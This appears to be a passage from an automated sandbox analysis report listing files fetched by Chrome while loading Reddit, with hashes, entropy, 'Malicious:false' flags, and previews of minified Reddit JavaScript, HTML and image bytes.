                                                  Preview:import{a as e,b as a,u as t,v as r,t as s,_ as i,n as l,g as o,e as n}from"./shell-4994f581.js";import{x as d,s as c}from"./icon-4d9be652.js";let p=class extends(e(c)){constructor(){super(...arguments),this.showErrorMessage=!1,this.handleFaceplateError=e=>{const t=function(e){return"faceplate-error"===e.type}(e)?e.detail.message:"page load returned no data";this.trackEvent(a({source:"feed",action:"failed",noun:"page_load"},{action_info:{reason:t,page_type:this.pageType}})),this.showErrorMessage=!0},this.handleFaceplateLoadStart=e=>{this.showErrorMessage=!1},this.handleRetry=()=>{this.showErrorMessage=!1,this.faceplatePartial?.load()}}get faceplatePartial(){return this.closest("faceplate-partial")}connectedCallback(){super.connectedCallback(),this.faceplatePartial?.addEventListener("faceplate-error",this.handleFaceplateError),this.faceplatePartial?.addEventListener("faceplate-load",this.handleFaceplateError),this.faceplatePartial?.addEventListener("faceplate-load-start",this.handleFacep
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1000)
                                                  Category:downloaded
                                                  Size (bytes):1057
                                                  Entropy (8bit):5.180593768642446
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D467A06D28C5012320279792D34493D3
                                                  SHA1:F761D11ED43BD84BF7BA822A0BC5033562041DB7
                                                  SHA-256:26724BABD80B4E6D7C7A97774BDD679907E155F6DE60BAC3F78F9EA1306E9370
                                                  SHA-512:AB0B26A0E7264A076D8184AC98030659FFBC464336E84D82186FCA520DFC3387326C1987E8AF1D1C2F6CB5F130CBEFC1C6E5C2D7E01E4BE0A1D11A6E1C9B101D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/reddit-sidebar-nav-28dd3865.js
                                                  Preview:import{N as t,_ as e,e as s,T as i,t as n}from"./shell-4994f581.js";import{s as a,x as l}from"./icon-4d9be652.js";const o=t(a);let c=class extends o{constructor(){super(...arguments),this.skipElement=null,this.initialize=()=>{this.classList.remove("hidden"),this.unsubscribe(i.PageDataLoaded,this.initialize)},this.onSkip=t=>{t.preventDefault(),t.stopPropagation();const e=this.querySelectorAll('button, [href], input, select, textarea, [tabindex]:not([tabindex="-1"])')?.[0];e instanceof HTMLElement?e.focus():this.focus()}}static get styles(){return[n]}connectedCallback(){super.connectedCallback(),this.setupSkipToNav(),this.subscribe(i.PageDataLoaded,this.initialize)}disconnectedCallback(){super.disconnectedCallback(),this.skipElement?.removeEventListener("click",this.onSkip)}setupSkipToNav(){this.skipElement=document.getElementById("skip-to-navigation"),this.skipElement?.addEventListener("click",this.onSkip)}render(){return l`<slot class="flex"></slot>`}};c=e([s("reddit-sidebar-nav")],c);
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (58821)
                                                  Category:downloaded
                                                  Size (bytes):687284
                                                  Entropy (8bit):5.405365888202435
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:CCEAC7398DC445D72279C3E98D14A1E5
                                                  SHA1:E06C501CB802EBFC0DFEAA9F915F32AD5E490C2B
                                                  SHA-256:61513D9B4B931D9075857A04B566BD15B33DC50E9B2D28DBD3DC325E612D8751
                                                  SHA-512:F5B9C8B676148A2699E373B6A16586265E31BB0F224DC709C00EAFA998F87E1E815EE57BB50BFB5059E5AF4E37AE81F1984666AE102154ED69D74AC1C5259D43
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.reddit.com/?rdt=54831
                                                  Preview:. <!DOCTYPE html>. <html lang="en-US" class="theme-beta">. <head prefix="og: https://ogp.me/ns#">. <title>Reddit - The heart of the internet</title>. <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">. <meta name="apple-mobile-web-app-capable" content="yes">. <meta name="apple-mobile-web-app-status-bar-style" content="black">. <meta name="msapplication-navbutton-color" content="#000000">. <meta name="theme-color" content="#000000">. . <meta name="description" content="Reddit is where millions of people gather for conversations about the things they care about, in over 100,000 subreddit communities." /> <meta property="og:image" content="https://www.redditstatic.com/shreddit/assets/favicon/192x192.png" /><meta property="og:image:width" content="256" /><meta property="og:image:height" content="256" /><meta property="og:site_name" content="Reddit" /><meta property="og:title" content="r
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (52387)
                                                  Category:downloaded
                                                  Size (bytes):52459
                                                  Entropy (8bit):5.463811550565209
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3D2C41EDFC520247C0BDDEF9EC0976D9
                                                  SHA1:08B96F7A92A9EB245000E2B14C05C9E744D50D06
                                                  SHA-256:8BF9EB15CC19AFAE0C30BA4F04F57BC5EE9F28C4A25AC6E2BD5FA33C5D8A443B
                                                  SHA-512:F850EB343B51B02F0002E3C826450F138143F3E63E3A742357315CFAE10E5DC93AC2F6B031DE5DA3B6C95F4DF27AFFD900988BF3D7EC9F4D47D7BC749BDB8CA0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/club-award-confirmation-client-js-b22d6f4f.js
                                                  Preview:import{e,i as t,t as s,b as n,T as a,A as o,cC as i,g as r,r as c,I as l,l as d,c8 as u,x as h,O as m}from"./icon-4d9be652.js";import{gW as p,gY as f,v as g,b,G as v,m as _,c_ as w,z as x,ic as y,C as E,x as C,id as $,ie as k,as as I,bH as S,ge as T,A as M,dV as D,c as L,l as A,L as N,fZ as P,ig as F,ih as O,ii as R,ij as U,u as B,gH as q,gI as z,hE as j,ik as V,bE as H,aK as W,E as G,aW as Z,aV as Q,aX as Y,by as K,a6 as J,s as X,aL as ee,gr as te,bO as se,c1 as ne,aj as ae}from"./shell-4994f581.js";class oe{get active(){return this.duration>0}get timeRemaining(){return`${Math.floor(this.duration/6e4)}:${Math.ceil(this.duration%6e4/1e3).toString().padStart(2,"0")}`}get secondsRemaining(){return Math.ceil(this.duration/1e3).toString()}constructor(e){this.duration=0,this.interval=0,this.update=()=>{this.duration=this.duration-this.interval,this.duration<=0&&this.reset(),this.host.requestUpdate()},this.host=e,this.host.addController(this)}hostDisconnected(){this.reset()}reset(){clearInte
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3390)
                                                  Category:downloaded
                                                  Size (bytes):3459
                                                  Entropy (8bit):5.181130489631069
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E2F5FC8481E81A2FBBD701BB3BC18414
                                                  SHA1:DDEE30247DCEC0E4561F63ACB6DE42C8C74D1C17
                                                  SHA-256:F9456A98AE8919036DDAD3D8491472CC554C02AD7E435DCD3B8CE6BEC59D9D96
                                                  SHA-512:FA40948A8B2E148352A2575BFD412D8A1600707A34A507D3D40A25E0ECC06F5A133D05F354E534A365F1F7422F1AF97F905E0D291710FD310F6692BDB8E13436
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/search-input-desktop-client-js-cb5b0267.js
                                                  Preview:import{_ as e,g as a,am as t,I as r,n as i,e as n,a3 as l}from"./shell-4994f581.js";import{a as o,x as s,K as c,I as p,l as h}from"./icon-4d9be652.js";import{B as d}from"./club-award-confirmation-client-js-b22d6f4f.js";import"./validate-image-fc8b467a.js";import{T as m}from"./text-input-1c750feb.js";import"./index-169ed00b.js";import"./filterNullish-3e68f24c.js";let v=class extends m{constructor(){super(...arguments),this.hasChips=!1,this.clearable=!0}static get styles(){return[super.styles,o`:host{margin:var(--spacer-2xs) var(--spacer-md);display:inline-flex}label{flex-grow:1}input{background:0 0;border:none;outline:0;width:100%;text-overflow:ellipsis}input::placeholder{color:var(--color-neutral-content-weak)}.label-container,:host([faceplate-validity=invalid]) .label-container,:host([faceplate-validity=valid]) .label-container{border:var(--rem2) solid var(--color-input-border);box-shadow:0 0 0 var(--rem2) transparent}.label-container{align-items:center;box-sizing:border-box;border-ra
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 320x180, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):11484
                                                  Entropy (8bit):7.983169137662212
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B666DBDAF7BB449BFF4BBE6254EB3BC7
                                                  SHA1:EF14A2A570919FC61F5A4D89A28F0799079220A2
                                                  SHA-256:C3E5532EDA1C0DB3519B9170471967CCB8C10BD1A3A6C69A1F534E5414A9637D
                                                  SHA-512:6743D3762E30A942D95C1AD8165D6517C1CAAF0744A445CB817F2DFB1437E4745140A5C712C63FECE6ACC634396BAF94F1E41A3A159B736F0410FA44BF27E66C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/ftc-sues-uber-says-company-charged-for-uber-one-without-v0-kT9Nhal_HQQtxcf8eKVARRPtoPlbH4aoXVXOXSUDNQo.jpg?width=320&crop=smart&auto=webp&s=6338bef17fddca5ee8ebe463223bc1a65ec595e1
                                                  Preview:RIFF.,..WEBPVP8 .,.......*@...>Q".D..!.Y..8....U....Eu..g....y.]......:..........#.7.G....1....~.{......c.g...........}.?............l...+.3.{...$.y}....?."........'...D........_{<....'.G.?....r...g....{s.O.>...zK...............}....?............B............Q.+.........b..".QV.~.u...q.M"."k............4Y$... ^..U......g..i.q.2.Ov_.....D.B<.S3.....spy.sx...Cl.......1..ih...!.V..)&.....U.w......X(l....r.D........M.3...+4.b.H.MU...>.W.....%......Ze..hY...o,V...L.J.2..q..;......hTn$....-.S..UP.{{m+,Ga>V...>......I...._<.....I..M....._...!;e..).*.M.e...q.2....[LR..c.r.s]I....r......`.u........[...RM. .H&.......Ob^....@.M..<.s..T.(.......hL..HLL.]c.k.....0......Y...JG[.....4-m..Q......oV.....`K4#.<HAFi.Qq.......M.m|@..K.....^.Q...K..d.Y.q.Q......m..[g(.A.`.e.....6..6...+......"H..&2,S...f.0..xkZ.W..i^k.L[...%l. .vv.HDp...L...oGO..n%].t}@H.+.b)...........1.9..*....y?.3...b.YJ7Z.....".. D...Pd\..L.^...W9Mb}.....G...5\.....).v.o|r.8F....Y.....5...G.B
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 128 x 102, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):18415
                                                  Entropy (8bit):7.978937138387296
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D7DA8676097B24FAEC1C158AE168E66E
                                                  SHA1:226420FE8CE70080D2AAAB72DC1B40038E0E5FD1
                                                  SHA-256:5052FCB52B5A73C716724A7A9CD3260ACD4248E5B6E2C92FBA83BBF9690C7020
                                                  SHA-512:CB6E047CC59524D0301A09CB4437D5B86B11DAADC3E0E709008868194AE9D00992318A8A5509208F533A0C912035EF0091EA496495631D6AF9CA61FF66D95754
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://emoji.redditmedia.com/n84r7411wfj01_t5_3hx3r/murder
                                                  Preview:.PNG........IHDR.......f......#.T...ZeXIfMM.*.............................J...........R.(.............................H.......H.....R.4..@.IDATx..=.xT..sw..M..FH!$$@..-....`.6,..|**6.....g..O..*BTT....@(.!.....&.{...$7..j.}.|..{g...s..9g..%.w.<!.P..S...<..>)....Z...........B..}..>8.1...02...x.....$Z.X........=c..+.B..*......fBh]v...7.Ii.hQA...7.....i..AKH.u% bKB.%..:........e..;.B.b.....tO.Z!..'.n.0T@..G.I...K8..b..4.&g..|.6z..ko....-HL..%D._7Wi.*..{O._:.#...}......i........t...k.=.@@>f..b.........?..#"...i.....X..Db...Y..E..r.g..2.|?n..Z...B..V+.....U...6/......0..._..$b..K.Vk..!.!......*..VK#.P?.D.V...1....7..t.o$...y....'5z..(Hn....U}..^UA.H...[....y`.V..&U.e...V ...l..w........@.e........B.}.Q>!A1(%.(..#?....eb\.!=.&[eC.#{>.<.o..N.kt..0...m.D>...c...y:.b.0.a.2...A..$v..jc........E8..........J..ooQ......v.B.......tG>>C...C.-...k..w.5...4.Q~.~..v....?O....;.c..s.6.z.M.....D..3..-......Z.J"..k...,......t..-t......f..bs.....{JZ0...G...;.....K.d...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1385)
                                                  Category:downloaded
                                                  Size (bytes):1440
                                                  Entropy (8bit):5.1453579557994615
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:36EDF6C857D14423933AD6D9EB8986D1
                                                  SHA1:261F3220243C250015685A43946CD1721AD2D2A9
                                                  SHA-256:08BF6B376FD32D93BD5F07658D1084D8E31480C5A39C34CCC0208798F0BAD744
                                                  SHA-512:F6235DEB9493D98389B14CED89BAA7FE004EB4791EDCCB5E0BE2DC60DBA49F91334AA2005ADB796253765BF87C722F423909CF5B06948C636AC2FA3357FC83B3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/guides-telemetry-aee80adb.js
                                                  Preview:import{_ as e,n as t,e as r,t as s,J as i,c as a,an as o}from"./shell-4994f581.js";import{s as n}from"./icon-4d9be652.js";let l=class extends n{constructor(){super(...arguments),this.overlayId="",this._registered=!1}static get styles(){return[s,i(":host {\n position: relative;\n z-index: 100;\n}\n")]}async connectedCallback(){super.connectedCallback(),this._registered||(this._registered=!0,await this.updateComplete,this.registerWithOverlayManager())}disconnectedCallback(){super.disconnectedCallback(),this._registered=!1,this.unregisterFromOverlayManager()}registerWithOverlayManager(){this.dispatchEvent(a("register-overlay-display",{display:this}))}unregisterFromOverlayManager(){this.dispatchEvent(a("unregister-overlay-display",{display:this}))}displayOverlay(e,t){this.overlayId=e,this.overlayProperties=t}renderTemplate(){if(!this.overlayId)return"";const e=this.querySelector(`template[slot=${this.overlayId}]`);return e instanceof HTMLTemplateElement?o(e):""}dismissOverlay(){this.over
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (622)
                                                  Category:downloaded
                                                  Size (bytes):688
                                                  Entropy (8bit):5.187498553698317
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:36F9A1DBCBBFC45E782E02EE7B09F41A
                                                  SHA1:E4AD0340DA633F046D700992A5F2F6784E9594CA
                                                  SHA-256:CC4ED35C19D3380485E6EEBFF8A7E9FFE5FE1701FCDF6AAB06DD5E7BABA0DFE6
                                                  SHA-512:72487A351D5ED89B634FA81100452BE73E6A886649C091AD31B7CF92FBD24A7C304B1C9971EF61E6D6F518F44A692B4F339AE6B30506E87FA7D5E77F01E75401
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/auth-flow-trigger-client-js-da8b0348.js
                                                  Preview:import{t,_ as e,n as o,e as r}from"./shell-4994f581.js";import{s}from"./icon-4d9be652.js";const n="auth-flow-manager";let a=class extends s{constructor(){super(...arguments),this.params={}}firstUpdated(){customElements.whenDefined(n).then((()=>{this._showStep(),this.remove()}))}_showStep(){const{step:t,params:e}=this;if(!t)return;const o=document.querySelector(n);if(!o)throw new Error("Auth flow manager was not found");o.show(t,e)}createRenderRoot(){return this}};a.styles=[t],e([o({type:String,reflect:!0})],a.prototype,"step",void 0),e([o({type:Object})],a.prototype,"params",void 0),a=e([r("auth-flow-trigger")],a);.//# sourceMappingURL=auth-flow-trigger-client-js-da8b0348.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 1080 x 2341, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):814307
                                                  Entropy (8bit):7.983204652326794
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:932859F7DE21BDF780070981104C662B
                                                  SHA1:E7D6C710D618751B990D5CFC7A42570E43088FA8
                                                  SHA-256:312D86533A47E2B0D5A9DCFD8A2F9E4667D03409CCBFC84FE8D008E683E1E1D1
                                                  SHA-512:B7804C082DB29D50325E62EBC59CB8BA9DF4DACEC70433282E4962544FB2E3D83D12D9896B015A9812D00D07390A4A2A0A581FE9F56CA01945B5D9CA0A6C7E55
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...8...%......Q.8....PLTE.^Ucc_..|.......t.....u.fU.[).nh....c;P6#.....s......K=/...lKG...qqn.i7;(..........sc..~.{us\W....a..W<*mg^zK.....vpzmb....{[In@....q_..t[B2~{tP0....Z..mY.tB.r..tg5.......WJ<.bS&.....jjf}lZ..|...}j.wZ..q.........}.iMsRDg`W....}b.[I.xD....n_._M....Y...mN:._P..}pmglE,...9!..s...gWxwr...aA8C6+........W'......dE@.ub..R....qT..}........kRwWF.m`gUG...rcR.}m.aG..y..v..p%......Q.[A.DZ:4.3.qRM..r.dQ\[V.A..WO.xk...|.QI..n...xS;......F/!.qMyXR.J..|c.....zM0.yX.^/...v4}vl.e..`@-....eJ...jZfI7.~...yXA.e..{N,)0#..y>.....qR?.V2.....|HB.da.|0......`1..o.tlE.....`QCPC6..............T.Ek)..c2.....yh..............c...D*.vrk........6-(....f+.|L...wgV........sc6..|q.n=..y!...=.m]M.M'.iC...?.zd^...p`.V0|H&.b.....T3/lH?.U..U%.f9...........pHYs............... .IDATx..}L.g.....3...d...@.tj..)..L.,......mD....t...@$.6v=..Y.5.....H.]VG.,...!._H,M.p..n..=..i....p]...~g....9......J;/..k...D".Cj...D"..C$..8D"..C$..8D
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):292
                                                  Entropy (8bit):5.026171954072487
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:389E2A0C1EC2127644A0192B63EA4F3B
                                                  SHA1:B9329F4775B24844BDB6C1BAF777217427875F39
                                                  SHA-256:B992AC6CADB9C93590AB291D2BD9B836AAA9F3DE6298558D8B03CD2EF7AF4084
                                                  SHA-512:A5731AF7AE8BB0C660FF17987A293588FDE2A8417966C6982886D862F56F2F3858A487C8C1B0267D0B00217F2BF2E52135D0E8EBF6E2E76B2B29269AE69A00C8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/media-lightbox-client-js-976ccbbe.js
                                                  Preview:import"./shreddit-media-lightbox-listener-6f703d9b.js";import"./zoomable-img-d1a4d4d2.js";import"./shell-4994f581.js";import"./icon-4d9be652.js";import"./index-56e4320e.js";import"./club-award-confirmation-client-js-b22d6f4f.js";.//# sourceMappingURL=media-lightbox-client-js-976ccbbe.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 96 x 96, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):7309
                                                  Entropy (8bit):7.949953801509432
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:65DC21635481CE103B32297C123775B4
                                                  SHA1:6C20007A7CCCA31F4C1C22C9339391E6146A3B01
                                                  SHA-256:BC28FBA20C26A632D7B3F51518F9644BFBF4CB5D1B1A7604A10BEB6910E8C49C
                                                  SHA-512:A83E86FC203EBA6249737252FD8223E9CD98BEEAA715C0DB7AFD42ABA83523990B4A8B87C3AF8C4197A7689B3FCF22B0E8DB6995D746A3F3426D8D60CFA42316
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...`...`......F......PLTE.L......`.wCr.v.....Z........W..Fq.X..}................u..........S|......`..Q}o=j.Kv......M{.Jt.V....b..w..r..m..o..]..i..`.............e..t.......r@o...}Fq.v..Px.........>|.....S{.Sy.]....a..m.........y....S..S.......b.wAl....W~......Z.......S..|..s....[..............u..j...o..P~.{...........b....[..a..u..a....h.....u..X.....|.~Ly.g..My...t..Lx.Mw.u......{..}..g..p.....|..`.........a..Y..{..R{...X..Qy.D..x......Q}...........Kv.y.{Gu..{..[..O..g..{..Py.{.|Bm.V~.K........^..X~.V.._..z..v.r?j._..Ny....t.....[.....s..o........Ht...j....[..T........Lu.l.....^..f..g...........{....[....T}.R..\..........j;k.v..W}....Z........p..N{.X..T..}...w..b..l..h..Rz.t...........}9y.]..V|.Z..{..Iu.f..Gs.X.................5.J....pHYs...#...#.x.?v...3IDATx.]..<......Ca.. #3...8L..rf.E..pK.CS.sR.HcI!W...""Y&...5.1.L3.2...61w....Os....8..[....n.s..gf....Ws..;w..x....L..'.....+.8.Std....'N.A....t.|......
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2074)
                                                  Category:downloaded
                                                  Size (bytes):2129
                                                  Entropy (8bit):5.098138158752419
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DA59FF7BE2B53754BB47B5B0C0100972
                                                  SHA1:60FA4095C31FC0EC76C91C7F6B0043BD18C09DCA
                                                  SHA-256:6A97927433079C503DA9BA439F9271B97492E3B881EDCCF1E41E281A700DDDCD
                                                  SHA-512:8D35EBF2F2A3C7C3F410C1ADE1C0F2BF8D7F4DF994569D4B6F2F8A526D75B270C20305BBBB8E0B618F1CC495D6B80B912E71A5EC0B8683E30237C27D3854E9EA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/mod-bulk-actions-983b8f48.js
                                                  Preview:import{M as a}from"./distinguished-tags-28b29a34.js";import{O as o,K as r}from"./shell-4994f581.js";var t;!function(a){a.approve="approve",a.remove="remove",a.confirmRemoval="confirm_removal"}(t||(t={}));const e={[a.ApproveContent]:t.approve,[a.ConfirmRemoval]:t.confirmRemoval,[a.RemoveContent]:t.remove};var n;!function(a){a.LimitedEditionAward="limited_edition_award"}(n||(n={}));let i=r;class s{async modBulkApprove(a){const{data:r}=await i({operation:o.ModBulkApprove,variables:{input:{ids:a}}});return r.modApproveBulk}async modBulkRemove(a,r=!1){const{data:t}=await i({operation:o.ModBulkRemove,variables:{input:{ids:a,isSpam:r}}});return t.modRemoveBulk}async modBulkRemoveAsSpam(a){const{data:r}=await i({operation:o.ModBulkRemove,variables:{input:{ids:a,isSpam:!0}}});return r.modRemoveBulk}async modBulkIgnore(a){const{data:r}=await i({operation:o.ModBulkIgnore,variables:{input:{ids:a}}});return r.modIgnoreBulk}async modBulkLock(a){const{data:r}=await i({operation:o.ModBulkLock,variable
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1473)
                                                  Category:downloaded
                                                  Size (bytes):1542
                                                  Entropy (8bit):5.038381704087222
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F5948956D7CDFD678C7AE6CCEB34D9EF
                                                  SHA1:5FA0DCA05D5B904A30044BB5617DA1E8BAB46BBA
                                                  SHA-256:14D416F3B5D60FEC77A88C03610B0A224C17801BAE8DCC973E83475328472E5E
                                                  SHA-512:ADD47A4E17266640211C7748DBE5844EC47957FF907380B4A9D0D0AF5BBDBD052800494D19A8824241551ACFFF4CD69D894E2C51EA4466A477E8D9E32691A8AF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-auto-height-animator-6e628cf9.js
                                                  Preview:import{E as t,_ as e,n as s,e as i}from"./shell-4994f581.js";import{s as n}from"./icon-4d9be652.js";let o=class extends n{constructor(){super(...arguments),this.open=!1,this._events=new t(this),this._firstUpdate=!0,this.updated=t=>{t.has("open")&&!this._firstUpdate&&(this.open?this._expand():this._collapse()),this._firstUpdate=!1},this._expand=()=>{this._content.style.display="block",this.offsetHeight!==this._content.offsetHeight&&(h(this,this._content.offsetHeight),this._content.style.opacity="1")},this._collapse=()=>{0!==this.offsetHeight&&(h(this,0),this._content.style.opacity="0")},this._onTransitionEnd=()=>{this.open?this.style.height="":(this.open=!1,this._content.style.display="none"),this.style.overflowY="visible"},this._handler=this._events.define("transitionend",this._onTransitionEnd)}connectedCallback(){super.connectedCallback(),this._content=this.querySelector("[faceplate-auto-height-animator-content]"),null!=this._content&&(this.style.transition="height 222ms ease",this._c
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):75106
                                                  Entropy (8bit):5.253324941842653
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B8D56ADB59E1CB0EE23187AA7875D2E4
                                                  SHA1:1A307D3081E354C14BC0A2E0FF35F714E128BBE5
                                                  SHA-256:762876778AEDE8BC844F652DD5B9BD530A46661E68CE962FAEA22DD896430F2F
                                                  SHA-512:3535EE5DE1978E87B34D64CCD4C1891AB905CAC924DFF8E00C5B4258DBF91C90469ACF4E0E1D4BEE695976700D39B5B9F3FB6AABD984DB617155AE093B1D3DBE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-player-2-c1d75db3.js
                                                  Preview:import{cP as t,f0 as e,i9 as i,c as s,O as o,H as r,K as n,l as a,T as l,P as h,aV as d,gd as c,b as u,r as p,ia as m,s as v,ib as y,t as g,_ as b,n as f,e as E,I as C,g as w,bu as k,a as _,ak as A}from"./shell-4994f581.js";import{x as S,A as L,I as P,a as T,s as I,z as x,d6 as M,dW as R,dZ as $,dl as D,d_ as O,dD as V,dC as U,d$ as F,e0 as B,e1 as N,e2 as H}from"./icon-4d9be652.js";import{A as q,a as j,b as z,f as Q,c as W,d as G,e as J,g as K,h as Y,i as X,P as Z,S as tt}from"./ssa-parser-f2f362d6.js";import{A as et}from"./club-award-confirmation-client-js-b22d6f4f.js";import{o as it,u as st}from"./errors-98e883e2.js";import{a as ot,F as rt,M as nt,P as at,Q as lt,b as ht,c as dt,A as ct,d as ut,T as pt,e as mt}from"./upload-350fce7d.js";class vt{constructor(t){this.fromReconnect=!1,(this.host=t).addController(this)}async hostConnected(){await this._enableAutoplayIfApplicable()}fullscreenChange(){this.trackEvent(q)}pause(){this.trackEvent(j)}play(){this.trackEvent(z)}timeUpdate(){thi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (6453)
                                                  Category:downloaded
                                                  Size (bytes):6508
                                                  Entropy (8bit):5.384110936057558
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AB71F79D35BD005797D40F076DD7C882
                                                  SHA1:E6795C06F33B2961A6EFD760B2E5D1904BC6D984
                                                  SHA-256:6E7DE3698CCF06754293575B9D758BEE7A1EF8792D534E69A7043C29257BA456
                                                  SHA-512:A383735F9B73766C1B6227BE19D10647D2F8B9E4E1BD31DBFC781AF876017D281C90127A67B4626ADDCE89693012F2F0CDF39441E1F30FDCB9BB050F72D92C6A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/gallery-carousel-f4996dfe.js
                                                  Preview:import{a as e,W as t,P as i,T as s,p as a,t as o,_ as r,n,g as l,e as h}from"./shell-4994f581.js";import{C as d,N as c,I as u,P as p,F as g}from"./community-club-highlights-client-js-c7c6ec6d.js";import{x as b,l as m,s as y}from"./icon-4d9be652.js";import{G as v}from"./gallery-74f99861.js";import{A as x}from"./ads-carousel-bdc648e7.js";import"./index-56e4320e.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./index-e6388eb1.js";import"./links-27a3f3ef.js";const w=e(t(y));let I=class extends w{constructor(){super(...arguments),this.postId="",this.carouselStyle="",this.advanceAnimation=!1,this.fetchAheadCount=2,this.useMediaLightbox=!1,this.useCarouselEvolution=!1,this.isInsideLightbox=!1,this.pubsub=new i(this),this.currentPageNumber=1,this.observerIsIntersectingCallback=()=>{this.fetchAhead(),this.disableObserver()},this.fetchAhead=()=>{const e=this.currentPageNumber,t=e+this.fetchAheadCount;this.pagesElms.slice(e,t).forEach((e=>{e.querySelectorAll("[data-lazy-src]").
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 40 x 40, 8-bit colormap, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):1564
                                                  Entropy (8bit):7.567378568556752
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AEBDBE44404FC83D7EFECF34B5F015C0
                                                  SHA1:EB9B29971E5FE9DFC4FAD14841616283D21A562D
                                                  SHA-256:7A665CDD1BF780821B9E1710AEAA48D1AEE33FF6FBF143C2CC4507C92AD5FF4E
                                                  SHA-512:BA0BE3E05092E60E41517811A4F493FC1E9CA0DFBFA8CFF51B63A51B444642139E796E180B8E2C509567B990376BFB96D481D2065F011FC21A9A86A1AC215537
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/marketplace-assets/v1/core/awards/hehehe_v1_40.png
